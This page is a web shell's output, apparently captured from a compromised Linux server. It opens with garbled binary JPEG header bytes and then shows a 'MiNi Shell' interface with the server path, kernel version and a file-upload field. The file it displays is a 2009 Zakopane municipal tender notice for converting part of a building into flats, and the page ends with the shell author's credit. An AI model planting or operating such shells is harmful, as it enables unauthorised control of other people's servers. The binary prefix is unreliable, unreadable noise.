JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/155402-N-2009.html

<p class="kh_header"><b>Zakopane: ZP/341/23/09 koncepcja architektoniczno-przestrzenna adaptacji na lokale mieszkalne części budynku przy ul. Jagiellońskiej 7 w Zakopanem</b><br>
<b>Numer ogłoszenia: 155402 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/23/09 koncepcja architektoniczno-przestrzenna adaptacji na lokale mieszkalne części budynku przy ul. Jagiellońskiej 7 w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest  wykonanie i dostarczenie koncepcji architektoniczno - przestrzennej  oraz materiałów przedprojektowych dla zadania inwestycyjnego nr 13/08 Adaptacja na lokale mieszkalne części budynku zlokalizowanego przy ul. Jagiellońskiej 7 w Zakopanem.

1	Zakres przedmiotu zamówienia obejmuje:

1.1.	ustalenie szczegółowego zakresu adaptacyjnych  robót budowlanych,
koniecznych do zmiany dotychczasowego sposobu użytkowania lokali biurowych 
na lokale mieszkalne i  wyodrębnienia samodzielnych lokali wraz z pomieszczeniami przynależnymi i osiągnięcia przez nie wymaganych standardów technicznych, 
1.2.	wykonanie aktualizacji  inwentaryzacji z ograniczeniem jej zakresu do potrzeb sporządzenia wniosku o wydanie decyzji WZ i wniosku o dokonanie odstępstwa 
od obowiązujących  warunków technicznych w trybie  art.9 Prawa Budowlanego
1.3.	pozyskanie map niezbędnych do wykonania  zlecanego zadania,
1.4.	wykonanie i dostarczenie koncepcji architektoniczno-przestrzennej zmiany dotychczasowego sposobu użytkowania części budynku i wyodrębnienia samodzielnych lokali, obejmującej budynek jak również  zagospodarowanie zewnętrzne terenu ,
1.5.	przygotowanie i złożenie  w Wydziale Architektury i Urbanistyki UM Zakopane  kompletnego wniosku do uzyskania decyzji WZ, po jego uprzedniej akceptacji 
i podpisaniu przez Zamawiającego,
1.6.	wykonanie i dostarczenie rysunków i opisów koniecznych  odstępstw od warunków technicznych umożliwiających adaptacje istniejących pomieszczeń na lokale mieszkalne, jako załączników do wniosku w trybie art.9 Prawa Budowlanego,
1.7.	przygotowanie i złożenie  w Starostwie Tatrzańskim  kompletnego wniosku 
o dokonanie odstępstwa od warunków technicznych, po jego uprzedniej akceptacji 
i podpisaniu przez Zamawiającego
1.8.	wykonanie i dostarczenie wstępnej wyceny kosztów zamierzonej inwestycji,
1.9.	czynny udział w procedurze pozyskiwania  decyzji WZ od momentu złożenia wniosku do momentu uzyskania przez Zamawiającego decyzji WZ ,
1.10.	czynny udział w procedurze  wnioskowania o dokonanie odstępstwa  od momentu złożenia wniosku do momentu uzyskania przez Zamawiającego decyzji administracyjnej,  
1.11.	zbycie praw autorskich do wykonanej w ramach zleconego zadania  koncepcji, rysunków, opisów   na wszelkich polach działania na rzecz Zamawiającego,

 Przyjęte przez Projektanta założenia wstępne do koncepcji architektoniczno -przestrzennej  zmiany dotychczasowego sposobu użytkowania oraz wyodrębnienia lokali, szczególnie co do  ilości i zakresu funkcjonalnego samodzielnych lokali,  wymagają  uzgodnienia przez Zamawiającego przed dalszym kontynuowaniem prac projektowych 

2	Orientacyjne dane techniczno użytkowe całości obiektu:

2.1.	kubatura 10 830  m 3 
2.2.	pow. użytkowa:  2 506,0  m2 

3	Opracowana dokumentacja ma służyć:

3.1.	uzyskaniu przez Zamawiającego  decyzji WZ na  zmianę dotychczasowego sposobu użytkowania części budynku
3.2.	uzyskaniu przez Zamawiającego  decyzji w sprawie uzyskania odstępstwa  
od warunków technicznych 
3.3.	jako materiały wyjściowe Zamawiającego  do przeprowadzenia procedur PZP sporządzenia dokumentacji projektowo kosztorysowej na zmianę dotychczasowego sposobu użytkowania części budynku i wyodrębnienia samodzielnych lokali.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium przetargowego<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22 ust.1 ustawy Prawo zamówień publicznych tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
 

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych

Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualny odpis z właściwego rejestru , albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru , lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.podpisane oświadczenie o spełnianiu warunków, stanowiące załącznik nr 1 do  siwz,

3.na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć do ofert wykaz (należy wypełnić załącznik nr 4 do niniejszej siwz) wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania , a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie świadczył usługi odpowiadające swoim rodzajem i  wartością usługom stanowiącym przedmiot zamówienia tj. co najmniej 2 dokumentacje projektowe  o zakresie odpowiadającym swoim rodzajem i wartością przedmiotowi zamówienia, 
tj. wykonaniem dokumentacji projektowej zmiany  dotychczasowego przeznaczenia w budynku mieszkalnym lub zamieszkania zbiorowego o kubaturze większej od 1000 m3 
i wartości  nie mniejszej niż złożona oferta  każda,
Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty (np; referencje) potwierdzające, że podane w wykazie usługi zostały wykonane należycie.

4.wypwłniony druk oferty stanowiący załącznik nr 2 do niniejszej siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

5. wykaz osób( należy wypełnić załącznik nr 5 do  siwz) , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  lub  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa , wykonawca wskazał osoby, którymi będzie dysponował ,  

Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać , że wykonawca   dysponuje lub będzie dysponował  osobami :

- posiadającymi  uprawnienia budowlane w specjalności architektonicznej bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, należące do właściwej izby samorządu zawodowego , a w przypadku opracowań i czynności geodezyjnych udział osób uprawnionych do ich wykonywania.

- do oferty należy załączyć poświadczone przez  wykonawcę za zgodność z oryginałem, kopie odpisu uprawnień dla osób wymienionych w wymaganym wykazie  oraz  załączyć  aktualne zaświadczenia i o wpisie na listę samorządu zawodowego

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII -1  specyfikacji, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Uwaga! Dokument, o którym  mowa  powyżej powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa  w pkt.XIV  zastępuje się go  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania

UWAGA! 
Dokumenty mogą być przedstawione w formie kopii  (kserokopii)  poświadczonych za zgodność z oryginałem  przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział  Rozwoju Lokalnego i Inwestycji
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 12:00, miejsce: Biuro ds zamówień publicznych (pok.8 ,7)
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W oparciu o art.144 ust.1 ustawy zamawiający informuje, że:

1.wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego kluczowego specjalistę. Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
-śmierci, choroby lub innych zdarzeń losowych kluczowego specjalisty,
-nie wywiązywania się kluczowego specjalisty z obowiązków wynikających 
              z umowy,
- jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych 
   przyczyn niezależnych od wykonawcy (np. rezygnacji itp.).

       2.zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli  
          uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
3.	w przypadku zmiany kluczowego specjalisty, nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
4.	wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie 
z żądaniem zamawiającego w terminie wskazanym we wniosku zamawiającego
5.	w przypadku zwłoki, z przyczyn  nie leżących po stronie Wykonawcy, spowodowanej przedłużaniem się  procedur administracyjnych, Zamawiający na pisemny umotywowany wniosek wykonawcy  dopuszcza przedłużenie terminu wykonania umowy w formie aneksu, z zachowaniem przepisów ustawy

Creat By MiNi SheLL
Email: jattceo@gmail.com